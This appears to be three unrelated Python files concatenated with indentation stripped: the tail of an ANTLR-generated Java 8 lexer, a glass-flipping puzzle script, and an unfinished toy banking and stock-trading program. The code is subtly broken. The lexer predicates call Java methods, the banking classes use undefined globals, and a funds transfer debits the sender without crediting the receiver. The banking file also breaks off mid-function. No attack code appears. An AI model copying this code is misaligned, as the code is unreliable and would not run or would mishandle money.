buf.write(u"\u0327\3\2\2\2\u032b\u00a2\3\2\2\2\u032c\u032d\5\u00a5")
buf.write(u"S\2\u032d\u032e\5\u00a7T\2\u032e\u00a4\3\2\2\2\u032f")
buf.write(u"\u0330\t\t\2\2\u0330\u00a6\3\2\2\2\u0331\u0333\5\u00a9")
buf.write(u"U\2\u0332\u0331\3\2\2\2\u0332\u0333\3\2\2\2\u0333\u0334")
buf.write(u"\3\2\2\2\u0334\u0335\5u;\2\u0335\u00a8\3\2\2\2\u0336")
buf.write(u"\u0337\t\n\2\2\u0337\u00aa\3\2\2\2\u0338\u0339\t\13\2")
buf.write(u"\2\u0339\u00ac\3\2\2\2\u033a\u033b\5\u00afX\2\u033b\u033d")
buf.write(u"\5\u00b1Y\2\u033c\u033e\5\u00abV\2\u033d\u033c\3\2\2")
buf.write(u"\2\u033d\u033e\3\2\2\2\u033e\u00ae\3\2\2\2\u033f\u0341")
buf.write(u"\5\u0081A\2\u0340\u0342\7\60\2\2\u0341\u0340\3\2\2\2")
buf.write(u"\u0341\u0342\3\2\2\2\u0342\u034b\3\2\2\2\u0343\u0344")
buf.write(u"\7\62\2\2\u0344\u0346\t\4\2\2\u0345\u0347\5\u0083B\2")
buf.write(u"\u0346\u0345\3\2\2\2\u0346\u0347\3\2\2\2\u0347\u0348")
buf.write(u"\3\2\2\2\u0348\u0349\7\60\2\2\u0349\u034b\5\u0083B\2")
buf.write(u"\u034a\u033f\3\2\2\2\u034a\u0343\3\2\2\2\u034b\u00b0")
buf.write(u"\3\2\2\2\u034c\u034d\5\u00b3Z\2\u034d\u034e\5\u00a7T")
buf.write(u"\2\u034e\u00b2\3\2\2\2\u034f\u0350\t\f\2\2\u0350\u00b4")
buf.write(u"\3\2\2\2\u0351\u0352\7v\2\2\u0352\u0353\7t\2\2\u0353")
buf.write(u"\u0354\7w\2\2\u0354\u035b\7g\2\2\u0355\u0356\7h\2\2\u0356")
buf.write(u"\u0357\7c\2\2\u0357\u0358\7n\2\2\u0358\u0359\7u\2\2\u0359")
buf.write(u"\u035b\7g\2\2\u035a\u0351\3\2\2\2\u035a\u0355\3\2\2\2")
buf.write(u"\u035b\u00b6\3\2\2\2\u035c\u035d\7)\2\2\u035d\u035e\5")
buf.write(u"\u00b9]\2\u035e\u035f\7)\2\2\u035f\u0365\3\2\2\2\u0360")
buf.write(u"\u0361\7)\2\2\u0361\u0362\5\u00c1a\2\u0362\u0363\7)\2")
buf.write(u"\2\u0363\u0365\3\2\2\2\u0364\u035c\3\2\2\2\u0364\u0360")
buf.write(u"\3\2\2\2\u0365\u00b8\3\2\2\2\u0366\u0367\n\r\2\2\u0367")
buf.write(u"\u00ba\3\2\2\2\u0368\u036a\7$\2\2\u0369\u036b\5\u00bd")
buf.write(u"_\2\u036a\u0369\3\2\2\2\u036a\u036b\3\2\2\2\u036b\u036c")
buf.write(u"\3\2\2\2\u036c\u036d\7$\2\2\u036d\u00bc\3\2\2\2\u036e")
buf.write(u"\u0370\5\u00bf`\2\u036f\u036e\3\2\2\2\u0370\u0371\3\2")
buf.write(u"\2\2\u0371\u036f\3\2\2\2\u0371\u0372\3\2\2\2\u0372\u00be")
buf.write(u"\3\2\2\2\u0373\u0376\n\16\2\2\u0374\u0376\5\u00c1a\2")
buf.write(u"\u0375\u0373\3\2\2\2\u0375\u0374\3\2\2\2\u0376\u00c0")
buf.write(u"\3\2\2\2\u0377\u0378\7^\2\2\u0378\u037c\t\17\2\2\u0379")
buf.write(u"\u037c\5\u00c3b\2\u037a\u037c\5\u00c7d\2\u037b\u0377")
buf.write(u"\3\2\2\2\u037b\u0379\3\2\2\2\u037b\u037a\3\2\2\2\u037c")
buf.write(u"\u00c2\3\2\2\2\u037d\u037e\7^\2\2\u037e\u0389\5\u008f")
buf.write(u"H\2\u037f\u0380\7^\2\2\u0380\u0381\5\u008fH\2\u0381\u0382")
buf.write(u"\5\u008fH\2\u0382\u0389\3\2\2\2\u0383\u0384\7^\2\2\u0384")
buf.write(u"\u0385\5\u00c5c\2\u0385\u0386\5\u008fH\2\u0386\u0387")
buf.write(u"\5\u008fH\2\u0387\u0389\3\2\2\2\u0388\u037d\3\2\2\2\u0388")
buf.write(u"\u037f\3\2\2\2\u0388\u0383\3\2\2\2\u0389\u00c4\3\2\2")
buf.write(u"\2\u038a\u038b\t\20\2\2\u038b\u00c6\3\2\2\2\u038c\u038e")
buf.write(u"\7^\2\2\u038d\u038f\7w\2\2\u038e\u038d\3\2\2\2\u038f")
buf.write(u"\u0390\3\2\2\2\u0390\u038e\3\2\2\2\u0390\u0391\3\2\2")
buf.write(u"\2\u0391\u0392\3\2\2\2\u0392\u0393\5\u0085C\2\u0393\u0394")
buf.write(u"\5\u0085C\2\u0394\u0395\5\u0085C\2\u0395\u0396\5\u0085")
buf.write(u"C\2\u0396\u00c8\3\2\2\2\u0397\u0398\7p\2\2\u0398\u0399")
buf.write(u"\7w\2\2\u0399\u039a\7n\2\2\u039a\u039b\7n\2\2\u039b\u00ca")
buf.write(u"\3\2\2\2\u039c\u039d\7*\2\2\u039d\u00cc\3\2\2\2\u039e")
buf.write(u"\u039f\7+\2\2\u039f\u00ce\3\2\2\2\u03a0\u03a1\7}\2\2")
buf.write(u"\u03a1\u00d0\3\2\2\2\u03a2\u03a3\7\177\2\2\u03a3\u00d2")
buf.write(u"\3\2\2\2\u03a4\u03a5\7]\2\2\u03a5\u00d4\3\2\2\2\u03a6")
buf.write(u"\u03a7\7_\2\2\u03a7\u00d6\3\2\2\2\u03a8\u03a9\7=\2\2")
buf.write(u"\u03a9\u00d8\3\2\2\2\u03aa\u03ab\7.\2\2\u03ab\u00da\3")
buf.write(u"\2\2\2\u03ac\u03ad\7\60\2\2\u03ad\u00dc\3\2\2\2\u03ae")
buf.write(u"\u03af\7?\2\2\u03af\u00de\3\2\2\2\u03b0\u03b1\7@\2\2")
buf.write(u"\u03b1\u00e0\3\2\2\2\u03b2\u03b3\7>\2\2\u03b3\u00e2\3")
buf.write(u"\2\2\2\u03b4\u03b5\7#\2\2\u03b5\u00e4\3\2\2\2\u03b6\u03b7")
buf.write(u"\7\u0080\2\2\u03b7\u00e6\3\2\2\2\u03b8\u03b9\7A\2\2\u03b9")
buf.write(u"\u00e8\3\2\2\2\u03ba\u03bb\7<\2\2\u03bb\u00ea\3\2\2\2")
buf.write(u"\u03bc\u03bd\7?\2\2\u03bd\u03be\7?\2\2\u03be\u00ec\3")
buf.write(u"\2\2\2\u03bf\u03c0\7>\2\2\u03c0\u03c1\7?\2\2\u03c1\u00ee")
buf.write(u"\3\2\2\2\u03c2\u03c3\7@\2\2\u03c3\u03c4\7?\2\2\u03c4")
buf.write(u"\u00f0\3\2\2\2\u03c5\u03c6\7#\2\2\u03c6\u03c7\7?\2\2")
buf.write(u"\u03c7\u00f2\3\2\2\2\u03c8\u03c9\7(\2\2\u03c9\u03ca\7")
buf.write(u"(\2\2\u03ca\u00f4\3\2\2\2\u03cb\u03cc\7~\2\2\u03cc\u03cd")
buf.write(u"\7~\2\2\u03cd\u00f6\3\2\2\2\u03ce\u03cf\7-\2\2\u03cf")
buf.write(u"\u03d0\7-\2\2\u03d0\u00f8\3\2\2\2\u03d1\u03d2\7/\2\2")
buf.write(u"\u03d2\u03d3\7/\2\2\u03d3\u00fa\3\2\2\2\u03d4\u03d5\7")
buf.write(u"-\2\2\u03d5\u00fc\3\2\2\2\u03d6\u03d7\7/\2\2\u03d7\u00fe")
buf.write(u"\3\2\2\2\u03d8\u03d9\7,\2\2\u03d9\u0100\3\2\2\2\u03da")
buf.write(u"\u03db\7\61\2\2\u03db\u0102\3\2\2\2\u03dc\u03dd\7(\2")
buf.write(u"\2\u03dd\u0104\3\2\2\2\u03de\u03df\7~\2\2\u03df\u0106")
buf.write(u"\3\2\2\2\u03e0\u03e1\7`\2\2\u03e1\u0108\3\2\2\2\u03e2")
buf.write(u"\u03e3\7\'\2\2\u03e3\u010a\3\2\2\2\u03e4\u03e5\7/\2\2")
buf.write(u"\u03e5\u03e6\7@\2\2\u03e6\u010c\3\2\2\2\u03e7\u03e8\7")
buf.write(u"<\2\2\u03e8\u03e9\7<\2\2\u03e9\u010e\3\2\2\2\u03ea\u03eb")
buf.write(u"\7-\2\2\u03eb\u03ec\7?\2\2\u03ec\u0110\3\2\2\2\u03ed")
buf.write(u"\u03ee\7/\2\2\u03ee\u03ef\7?\2\2\u03ef\u0112\3\2\2\2")
buf.write(u"\u03f0\u03f1\7,\2\2\u03f1\u03f2\7?\2\2\u03f2\u0114\3")
buf.write(u"\2\2\2\u03f3\u03f4\7\61\2\2\u03f4\u03f5\7?\2\2\u03f5")
buf.write(u"\u0116\3\2\2\2\u03f6\u03f7\7(\2\2\u03f7\u03f8\7?\2\2")
buf.write(u"\u03f8\u0118\3\2\2\2\u03f9\u03fa\7~\2\2\u03fa\u03fb\7")
buf.write(u"?\2\2\u03fb\u011a\3\2\2\2\u03fc\u03fd\7`\2\2\u03fd\u03fe")
buf.write(u"\7?\2\2\u03fe\u011c\3\2\2\2\u03ff\u0400\7\'\2\2\u0400")
buf.write(u"\u0401\7?\2\2\u0401\u011e\3\2\2\2\u0402\u0403\7>\2\2")
buf.write(u"\u0403\u0404\7>\2\2\u0404\u0405\7?\2\2\u0405\u0120\3")
buf.write(u"\2\2\2\u0406\u0407\7@\2\2\u0407\u0408\7@\2\2\u0408\u0409")
buf.write(u"\7?\2\2\u0409\u0122\3\2\2\2\u040a\u040b\7@\2\2\u040b")
buf.write(u"\u040c\7@\2\2\u040c\u040d\7@\2\2\u040d\u040e\7?\2\2\u040e")
buf.write(u"\u0124\3\2\2\2\u040f\u0413\5\u0127\u0094\2\u0410\u0412")
buf.write(u"\5\u0129\u0095\2\u0411\u0410\3\2\2\2\u0412\u0415\3\2")
buf.write(u"\2\2\u0413\u0411\3\2\2\2\u0413\u0414\3\2\2\2\u0414\u0126")
buf.write(u"\3\2\2\2\u0415\u0413\3\2\2\2\u0416\u041d\t\21\2\2\u0417")
buf.write(u"\u0418\n\22\2\2\u0418\u041d\6\u0094\2\2\u0419\u041a\t")
buf.write(u"\23\2\2\u041a\u041b\t\24\2\2\u041b\u041d\6\u0094\3\2")
buf.write(u"\u041c\u0416\3\2\2\2\u041c\u0417\3\2\2\2\u041c\u0419")
buf.write(u"\3\2\2\2\u041d\u0128\3\2\2\2\u041e\u0425\t\25\2\2\u041f")
buf.write(u"\u0420\n\22\2\2\u0420\u0425\6\u0095\4\2\u0421\u0422\t")
buf.write(u"\23\2\2\u0422\u0423\t\24\2\2\u0423\u0425\6\u0095\5\2")
buf.write(u"\u0424\u041e\3\2\2\2\u0424\u041f\3\2\2\2\u0424\u0421")
buf.write(u"\3\2\2\2\u0425\u012a\3\2\2\2\u0426\u0427\7B\2\2\u0427")
buf.write(u"\u012c\3\2\2\2\u0428\u0429\7\60\2\2\u0429\u042a\7\60")
buf.write(u"\2\2\u042a\u042b\7\60\2\2\u042b\u012e\3\2\2\2\u042c\u042e")
buf.write(u"\t\26\2\2\u042d\u042c\3\2\2\2\u042e\u042f\3\2\2\2\u042f")
buf.write(u"\u042d\3\2\2\2\u042f\u0430\3\2\2\2\u0430\u0431\3\2\2")
buf.write(u"\2\u0431\u0432\b\u0098\2\2\u0432\u0130\3\2\2\2\u0433")
buf.write(u"\u0434\7\61\2\2\u0434\u0435\7,\2\2\u0435\u0439\3\2\2")
buf.write(u"\2\u0436\u0438\13\2\2\2\u0437\u0436\3\2\2\2\u0438\u043b")
buf.write(u"\3\2\2\2\u0439\u043a\3\2\2\2\u0439\u0437\3\2\2\2\u043a")
buf.write(u"\u043c\3\2\2\2\u043b\u0439\3\2\2\2\u043c\u043d\7,\2\2")
buf.write(u"\u043d\u043e\7\61\2\2\u043e\u043f\3\2\2\2\u043f\u0440")
buf.write(u"\b\u0099\2\2\u0440\u0132\3\2\2\2\u0441\u0442\7\61\2\2")
buf.write(u"\u0442\u0443\7\61\2\2\u0443\u0447\3\2\2\2\u0444\u0446")
buf.write(u"\n\27\2\2\u0445\u0444\3\2\2\2\u0446\u0449\3\2\2\2\u0447")
buf.write(u"\u0445\3\2\2\2\u0447\u0448\3\2\2\2\u0448\u044a\3\2\2")
buf.write(u"\2\u0449\u0447\3\2\2\2\u044a\u044b\b\u009a\2\2\u044b")
buf.write(u"\u0134\3\2\2\29\2\u028c\u0290\u0294\u0298\u029c\u02a3")
buf.write(u"\u02a8\u02aa\u02ae\u02b1\u02b5\u02bc\u02c0\u02c5\u02cd")
buf.write(u"\u02d0\u02d7\u02db\u02df\u02e5\u02e8\u02ef\u02f3\u02fb")
buf.write(u"\u02fe\u0305\u0309\u030d\u0312\u0315\u0318\u031d\u0320")
buf.write(u"\u0325\u032a\u0332\u033d\u0341\u0346\u034a\u035a\u0364")
buf.write(u"\u036a\u0371\u0375\u037b\u0388\u0390\u0413\u041c\u0424")
buf.write(u"\u042f\u0439\u0447\3\b\2\2")
return buf.getvalue()
class Java8Lexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
ABSTRACT = 1
ASSERT = 2
BOOLEAN = 3
BREAK = 4
BYTE = 5
CASE = 6
CATCH = 7
CHAR = 8
CLASS = 9
CONST = 10
CONTINUE = 11
DEFAULT = 12
DO = 13
DOUBLE = 14
ELSE = 15
ENUM = 16
EXTENDS = 17
FINAL = 18
FINALLY = 19
FLOAT = 20
FOR = 21
IF = 22
GOTO = 23
IMPLEMENTS = 24
IMPORT = 25
INSTANCEOF = 26
INT = 27
INTERFACE = 28
LONG = 29
NATIVE = 30
NEW = 31
PACKAGE = 32
PRIVATE = 33
PROTECTED = 34
PUBLIC = 35
RETURN = 36
SHORT = 37
STATIC = 38
STRICTFP = 39
SUPER = 40
SWITCH = 41
SYNCHRONIZED = 42
THIS = 43
THROW = 44
THROWS = 45
TRANSIENT = 46
TRY = 47
VOID = 48
VOLATILE = 49
WHILE = 50
IntegerLiteral = 51
FloatingPointLiteral = 52
BooleanLiteral = 53
CharacterLiteral = 54
StringLiteral = 55
NullLiteral = 56
LPAREN = 57
RPAREN = 58
LBRACE = 59
RBRACE = 60
LBRACK = 61
RBRACK = 62
SEMI = 63
COMMA = 64
DOT = 65
ASSIGN = 66
GT = 67
LT = 68
BANG = 69
TILDE = 70
QUESTION = 71
COLON = 72
EQUAL = 73
LE = 74
GE = 75
NOTEQUAL = 76
AND = 77
OR = 78
INC = 79
DEC = 80
ADD = 81
SUB = 82
MUL = 83
DIV = 84
BITAND = 85
BITOR = 86
CARET = 87
MOD = 88
ARROW = 89
COLONCOLON = 90
ADD_ASSIGN = 91
SUB_ASSIGN = 92
MUL_ASSIGN = 93
DIV_ASSIGN = 94
AND_ASSIGN = 95
OR_ASSIGN = 96
XOR_ASSIGN = 97
MOD_ASSIGN = 98
LSHIFT_ASSIGN = 99
RSHIFT_ASSIGN = 100
URSHIFT_ASSIGN = 101
Identifier = 102
AT = 103
ELLIPSIS = 104
WS = 105
COMMENT = 106
LINE_COMMENT = 107
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ u"DEFAULT_MODE" ]
literalNames = [ u"<INVALID>",
u"'abstract'", u"'assert'", u"'boolean'", u"'break'", u"'byte'",
u"'case'", u"'catch'", u"'char'", u"'class'", u"'const'", u"'continue'",
u"'default'", u"'do'", u"'double'", u"'else'", u"'enum'", u"'extends'",
u"'final'", u"'finally'", u"'float'", u"'for'", u"'if'", u"'goto'",
u"'implements'", u"'import'", u"'instanceof'", u"'int'", u"'interface'",
u"'long'", u"'native'", u"'new'", u"'package'", u"'private'",
u"'protected'", u"'public'", u"'return'", u"'short'", u"'static'",
u"'strictfp'", u"'super'", u"'switch'", u"'synchronized'", u"'this'",
u"'throw'", u"'throws'", u"'transient'", u"'try'", u"'void'",
u"'volatile'", u"'while'", u"'null'", u"'('", u"')'", u"'{'",
u"'}'", u"'['", u"']'", u"';'", u"','", u"'.'", u"'='", u"'>'",
u"'<'", u"'!'", u"'~'", u"'?'", u"':'", u"'=='", u"'<='", u"'>='",
u"'!='", u"'&&'", u"'||'", u"'++'", u"'--'", u"'+'", u"'-'",
u"'*'", u"'/'", u"'&'", u"'|'", u"'^'", u"'%'", u"'->'", u"'::'",
u"'+='", u"'-='", u"'*='", u"'/='", u"'&='", u"'|='", u"'^='",
u"'%='", u"'<<='", u"'>>='", u"'>>>='", u"'@'", u"'...'" ]
symbolicNames = [ u"<INVALID>",
u"ABSTRACT", u"ASSERT", u"BOOLEAN", u"BREAK", u"BYTE", u"CASE",
u"CATCH", u"CHAR", u"CLASS", u"CONST", u"CONTINUE", u"DEFAULT",
u"DO", u"DOUBLE", u"ELSE", u"ENUM", u"EXTENDS", u"FINAL", u"FINALLY",
u"FLOAT", u"FOR", u"IF", u"GOTO", u"IMPLEMENTS", u"IMPORT",
u"INSTANCEOF", u"INT", u"INTERFACE", u"LONG", u"NATIVE", u"NEW",
u"PACKAGE", u"PRIVATE", u"PROTECTED", u"PUBLIC", u"RETURN",
u"SHORT", u"STATIC", u"STRICTFP", u"SUPER", u"SWITCH", u"SYNCHRONIZED",
u"THIS", u"THROW", u"THROWS", u"TRANSIENT", u"TRY", u"VOID",
u"VOLATILE", u"WHILE", u"IntegerLiteral", u"FloatingPointLiteral",
u"BooleanLiteral", u"CharacterLiteral", u"StringLiteral", u"NullLiteral",
u"LPAREN", u"RPAREN", u"LBRACE", u"RBRACE", u"LBRACK", u"RBRACK",
u"SEMI", u"COMMA", u"DOT", u"ASSIGN", u"GT", u"LT", u"BANG",
u"TILDE", u"QUESTION", u"COLON", u"EQUAL", u"LE", u"GE", u"NOTEQUAL",
u"AND", u"OR", u"INC", u"DEC", u"ADD", u"SUB", u"MUL", u"DIV",
u"BITAND", u"BITOR", u"CARET", u"MOD", u"ARROW", u"COLONCOLON",
u"ADD_ASSIGN", u"SUB_ASSIGN", u"MUL_ASSIGN", u"DIV_ASSIGN",
u"AND_ASSIGN", u"OR_ASSIGN", u"XOR_ASSIGN", u"MOD_ASSIGN", u"LSHIFT_ASSIGN",
u"RSHIFT_ASSIGN", u"URSHIFT_ASSIGN", u"Identifier", u"AT", u"ELLIPSIS",
u"WS", u"COMMENT", u"LINE_COMMENT" ]
ruleNames = [ u"ABSTRACT", u"ASSERT", u"BOOLEAN", u"BREAK", u"BYTE",
u"CASE", u"CATCH", u"CHAR", u"CLASS", u"CONST", u"CONTINUE",
u"DEFAULT", u"DO", u"DOUBLE", u"ELSE", u"ENUM", u"EXTENDS",
u"FINAL", u"FINALLY", u"FLOAT", u"FOR", u"IF", u"GOTO",
u"IMPLEMENTS", u"IMPORT", u"INSTANCEOF", u"INT", u"INTERFACE",
u"LONG", u"NATIVE", u"NEW", u"PACKAGE", u"PRIVATE", u"PROTECTED",
u"PUBLIC", u"RETURN", u"SHORT", u"STATIC", u"STRICTFP",
u"SUPER", u"SWITCH", u"SYNCHRONIZED", u"THIS", u"THROW",
u"THROWS", u"TRANSIENT", u"TRY", u"VOID", u"VOLATILE",
u"WHILE", u"IntegerLiteral", u"DecimalIntegerLiteral",
u"HexIntegerLiteral", u"OctalIntegerLiteral", u"BinaryIntegerLiteral",
u"IntegerTypeSuffix", u"DecimalNumeral", u"Digits", u"Digit",
u"NonZeroDigit", u"DigitsAndUnderscores", u"DigitOrUnderscore",
u"Underscores", u"HexNumeral", u"HexDigits", u"HexDigit",
u"HexDigitsAndUnderscores", u"HexDigitOrUnderscore", u"OctalNumeral",
u"OctalDigits", u"OctalDigit", u"OctalDigitsAndUnderscores",
u"OctalDigitOrUnderscore", u"BinaryNumeral", u"BinaryDigits",
u"BinaryDigit", u"BinaryDigitsAndUnderscores", u"BinaryDigitOrUnderscore",
u"FloatingPointLiteral", u"DecimalFloatingPointLiteral",
u"ExponentPart", u"ExponentIndicator", u"SignedInteger",
u"Sign", u"FloatTypeSuffix", u"HexadecimalFloatingPointLiteral",
u"HexSignificand", u"BinaryExponent", u"BinaryExponentIndicator",
u"BooleanLiteral", u"CharacterLiteral", u"SingleCharacter",
u"StringLiteral", u"StringCharacters", u"StringCharacter",
u"EscapeSequence", u"OctalEscape", u"ZeroToThree", u"UnicodeEscape",
u"NullLiteral", u"LPAREN", u"RPAREN", u"LBRACE", u"RBRACE",
u"LBRACK", u"RBRACK", u"SEMI", u"COMMA", u"DOT", u"ASSIGN",
u"GT", u"LT", u"BANG", u"TILDE", u"QUESTION", u"COLON",
u"EQUAL", u"LE", u"GE", u"NOTEQUAL", u"AND", u"OR", u"INC",
u"DEC", u"ADD", u"SUB", u"MUL", u"DIV", u"BITAND", u"BITOR",
u"CARET", u"MOD", u"ARROW", u"COLONCOLON", u"ADD_ASSIGN",
u"SUB_ASSIGN", u"MUL_ASSIGN", u"DIV_ASSIGN", u"AND_ASSIGN",
u"OR_ASSIGN", u"XOR_ASSIGN", u"MOD_ASSIGN", u"LSHIFT_ASSIGN",
u"RSHIFT_ASSIGN", u"URSHIFT_ASSIGN", u"Identifier", u"JavaLetter",
u"JavaLetterOrDigit", u"AT", u"ELLIPSIS", u"WS", u"COMMENT",
u"LINE_COMMENT" ]
grammarFileName = u"Java8.g4"
def __init__(self, input=None, output=sys.stdout):
super(Java8Lexer, self).__init__(input, output=output)
self.checkVersion("4.7.1")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
def sempred(self, localctx, ruleIndex, predIndex):
if self._predicates is None:
preds = dict()
preds[146] = self.JavaLetter_sempred
preds[147] = self.JavaLetterOrDigit_sempred
self._predicates = preds
pred = self._predicates.get(ruleIndex, None)
if pred is not None:
return pred(localctx, predIndex)
else:
raise Exception("No registered predicate for:" + str(ruleIndex))
def JavaLetter_sempred(self, localctx, predIndex):
if predIndex == 0:
return Character.isJavaIdentifierStart(_input.LA(-1))
if predIndex == 1:
return Character.isJavaIdentifierStart(Character.toCodePoint(_input.LA(-2), _input.LA(-1)))
def JavaLetterOrDigit_sempred(self, localctx, predIndex):
if predIndex == 2:
return Character.isJavaIdentifierPart(_input.LA(-1))
if predIndex == 3:
return Character.isJavaIdentifierPart(Character.toCodePoint(_input.LA(-2), _input.LA(-1)))
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#100 glasses are arranged in a circle, all face-up. Person 1 flips every glass once, 100 flips in total; person 2 starts at no.2 and flips every second glass, also 100 flips; person 3 starts at no.3 and flips every third glass, 100 flips, and so on. After all 100 people are done, how many glasses are face-up?
import numpy as np
l=[]
n=100
a=np.zeros(n)
for i in range(1,n+1):
# person i makes n flips, starting at glass i and stepping by i, wrapping around the circle
for j in range(i,(n+1)*i,i):
pos = (j-1) % n
if(a[pos]==0):
a[pos]=1
else:
a[pos]=0
for x in range(n):
if(a[x]==0):
l.append(x+1)
print(l)
|
import threading
import sys
import hashlib
import sqlite3
import hmac
import rsa
class Customer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.connection = sqlite3.connect("Customer_Teller_loginInfo.db")
self.pubkey, self.privkey = rsa.newkeys(512)
self.cursor = self.connection.cursor()
self.stock_system = Stock_Trading_System()
def log_on(self):
# assume user info is already in the data base
userId = input(str("ID: "))
userPass = input(str("Password: "))
# grants access if hashed password matches the data base
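# (users rows are read positionally throughout this file: column 0 = userId,
# column 1 = sha256 hex digest of the password, column 2 = AccountNumber)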
cursor.execute("SELECT * FROM users WHERE userId = ?", (userId,))
user = cursor.fetchall()
try:
if user[0][1] != hashlib.sha256(userPass.encode()).hexdigest():
print("Password did not match.")
print()
return
except IndexError:
print("That username does not exist.")
return
while True:
print("----------------------------------")
print("What would you like to do?")
print("1. Return to menu")
print("2. Query account")
print("3. Transfer funds")
print("4. View profile")
print("5. Query stock")
print("6. Buy stock")
print("7. Sell Stock")
print("8. Log off")
print("----------------------------------")
choice = input("Enter a number choice here: ")
if choice == "1":
# return to menu
pass
if choice == "2":
self.query_account(userId)
if choice == "3":
self.transfer_funds(userId)
if choice == "4":
self.view_profile(userId)
if choice == "5":
self.query_stock(userId)
if choice == "6":
self.buy_stock(userId)
if choice == "7":
self.sell_stock(userId)
if choice == "8":
confirm = self.log_out()
if confirm:
return
else:
pass
def log_out(self):
choice = input("Are you sure you want to log-off?\nEnter y for yes, anything else for no: ")
if choice == 'y':
return True
else:
return False
def query_account(self, userId):
print()
acc_num = input("Enter the account number: ")
# input logic here for checking account number with user
cursor.execute("SELECT * FROM users WHERE AccountNumber = ?", (acc_num,))
accInfo = cursor.fetchone()
if userId == accInfo[0]:
print("Valid account number\n")
cursor.execute("SELECT * FROM Bank_Account where UserId = ?", (userId,))
balanceInfo = cursor.fetchone()
print("Your account balance: $", balanceInfo[1])
else:
print("Invalid account number")
return
def transfer_funds(self, userId):
print("\nTransfer funds\n\n\n")
transferAmount = float(input("Enter amount: $"))
fromAccount = int(input("Enter your account number: "))
toAccount = int(input("Enter the account number of the receiver: "))
cursor.execute("SELECT * FROM users WHERE userId = ?", (userId,))
accInfo = cursor.fetchone()
# checks if fromAccount matches their account number
if str(fromAccount) == str(accInfo[2]):
# checks if toAccount number exists
cursor.execute("SELECT * From users WHERE AccountNumber = ?", (toAccount,))
accnumberInfo = cursor.fetchall()
if len(accnumberInfo) != 0:
# check sending amount
cursor.execute("SELECT * FROM Bank_Account WHERE UserId = ?", (userId,))
bankInfo = cursor.fetchone()
if transferAmount <= bankInfo[1]:
# create a message digest of the transfer amount (note: computed here but not verified anywhere below)
amountHash = hashlib.sha256(str(transferAmount).encode()).hexdigest()
print("Sending $", transferAmount, "to account number:", toAccount)
# update user bank account balance
newAmount = bankInfo[1] - transferAmount
print(newAmount)
cursor.execute("UPDATE Bank_Account SET Balance = ? WHERE userId = ?", (newAmount, userId))
cursor.execute("SELECT * FROM Bank_Account WHERE UserId = ?", (userId,))
dx = cursor.fetchone()
connection.commit()
else:
print("Insufficient balance")
return
else:
print("Invalid sending account number")
return
else:
print("Invalid account number")
return
def view_profile(self, userId):
cursor.execute("SELECT * FROM User_Profile WHERE userId = ?", (userId,))
userProfile = cursor.fetchone()
print("User profile\n")
print("userId: ", userId)
print("\nFull Name: ", userProfile[1])
print("\nSSN: ", userProfile[2])
print("\nAddress: ", userProfile[3])
print("\nPhone number: ", userProfile[4])
print("\nIncome: $", userProfile[5])
print("\nEmail: ", userProfile[6])
def query_stock(self, userId):
cursor.execute("SELECT * FROM Stock_Transactions WHERE userId = ?", (userId,))
userStockInfo = cursor.fetchall()
if len(userStockInfo) == 0:
print("This user has no stock information at this time")
else:
pass
def buy_stock(self, userId):
cursor.execute("SELECT * FROM Bank_Account WHERE UserId = ?", (userId,))
bankInfo = cursor.fetchone()
print("User balance: $", bankInfo[1])
print("\n")
stock_name = str(input("Enter stock name: "))
stock_quantiy = int(input("Enter stock quantity: "))
stock_unit_price = int(input("Enter stock price: "))
acc_num = int(input("Enter account number: "))
total_stock_price = stock_quantiy * stock_unit_price
userBalance = bankInfo[1]
if total_stock_price <= userBalance:
# check if user input is correct to create a stock contract
if stock_quantiy > 0 and stock_unit_price > 0:
stock_contract = stock_name + "/" + str(stock_quantiy) + "/" + str(stock_unit_price) + "/" + str(acc_num) + "/" + "B"
print(stock_contract)
signature = rsa.sign(stock_contract.encode(), self.privkey, 'SHA-256')
if self.stock_system.buy_stock(stock_contract,signature,self.pubkey):
self.cursor.execute("INSERT INTO Stock_Transactions (userId,Stock_Name,Type,Amount,Unit_Price) VALUES (?,?,?,?,?)",(userId,stock_name,"BUY",stock_quantiy,stock_unit_price))
connection.commit()
else:
print("Message Compromised.")
return
else:
print("Error entering purchase order into a contract")
return
else:
print("Insufficient funds.")
return
def sell_stock(self,userId):
stock_name = str(input("Enter stock name: "))
stock_quantiy = int(input("Enter stock quantity: "))
stock_unit_price = int(input("Enter stock price: "))
acc_num = int(input("Enter account number: "))
self.cursor.execute("SELECT * FROM users WHERE AccountNumber = ?",(acc_num,))
total_stock_price = stock_quantiy * stock_unit_price
if len(self.cursor.fetchall()) == 0:
print("Invalid Account Number")
return
else:
stock_contract = stock_name + "/" + str(stock_quantiy) + "/" + str(stock_unit_price) + "/" + str(acc_num) + "/" + "S"
signature = rsa.sign(stock_contract.encode(), self.privkey, 'SHA-256')
if self.stock_system.sell_stock(stock_contract,signature,self.pubkey):
self.cursor.execute("INSERT OR IGNORE INTO Stock_Transactions (userId,Stock_Name,Type,Amount,Unit_Price) VALUES (?,?,?,?,?)",(userId,stock_name,"SELL",stock_quantiy,stock_unit_price))
connection.commit()
print("Stock sold.")
else:
print("Message Compromised.")
return
class Bank_Teller(threading.Thread):
def __init__(self):
pass
def log_on(self):
username = input("Enter your username: ")
password = input("Enter your password: ")
cursor.execute("SELECT * FROM users WHERE userId = ?", (username,))
user = cursor.fetchall()
try:
if user[0][1] != hashlib.sha256(password.encode()).hexdigest():
print("Password did not match.")
print()
return
except IndexError:
print("That username does not exist.")
return
# input logic here to confirm user/pass
while True:
print("----------------------------------")
print(" What would you like to do?")
print(" 1. Log Off")
print(" 2. Query Account")
print(" 3. Withdraw Funds")
print(" 4. View Profile")
print(" 5. Query Stock")
print("----------------------------------")
choice = input("Enter a number choice here: ")
if choice == "1":
confirm = self.log_out()
if confirm:
return
if choice == "2":
self.query_account()
if choice == "3":
self.withdraw_funds()
if choice == "4":
self.view_profile()
if choice == "5":
self.query_stock()
def log_out(self):
choice = input("Are you sure you want to log-off?\nEnter y for yes, anything else for no: ")
if choice == 'y':
return True
else:
return False
def query_account(self):
print()
acc_num = input("Enter the account number: ")
print(acc_num)
cursor.execute("SELECT * FROM users WHERE AccountNumber = ?", acc_num)
info = cursor.fetchall()
if len(info) == 0:
